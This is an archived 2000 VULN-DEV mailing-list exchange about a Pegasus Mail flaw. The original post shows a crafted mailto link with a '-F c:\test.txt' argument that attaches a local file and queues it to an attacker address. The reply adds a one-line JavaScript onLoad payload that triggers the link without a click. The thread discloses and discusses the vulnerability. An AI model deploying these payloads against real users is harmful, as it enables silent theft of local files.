Vulnerability Development mailing list archives

Re: Pegasus Mail


From: Knud Erik Hojgaard - CyberCity Support <kain () EGOTRIP DK>
Date: Tue, 3 Oct 2000 10:22:37 +0200

very interesting as a little javascript can 'click' a link for you..

<BODY onLoad="location.href='mailto:hacker () hakersite com -F c:\test.txt';">

havent tested since i havent got pegasus mail, but it works for what i used
it for earlier('clicking' the its:its:its. link)

Med venlig hilsen

Knud Erik Hojgaard <knud () cybercity dk>
Cybercity Erhvervssupport <support () erhverv cybercity dk>
http://www.cybercity.dk/support

-----Original Message-----
From: VULN-DEV List [mailto:VULN-DEV () SECURITYFOCUS COM]On Behalf Of
Imran Ghory
Sent: 2. oktober 2000 23:45
To: VULN-DEV () SECURITYFOCUS COM
Subject: Pegasus Mail


When using the following html,

<a href="mailto:hacker () hakersite com -F c:\test.txt"> Click
here</a>

When the user clicks on "Click here" Pegasus mail will
automatically creates a message which has a copy of the file
"c:\test.txt" and is addressed to "hacker () hakersite com" and
queues it ready to be sent without any further user intervention.

If instead of "hacker () hakersite com" we have a local user,
"hacker" the message won't be queued but just sent immediately.

As inorder to have files stolen the user would have to click on the
dubious looking link, is this security risk serious ?

Imran Ghory


Current thread: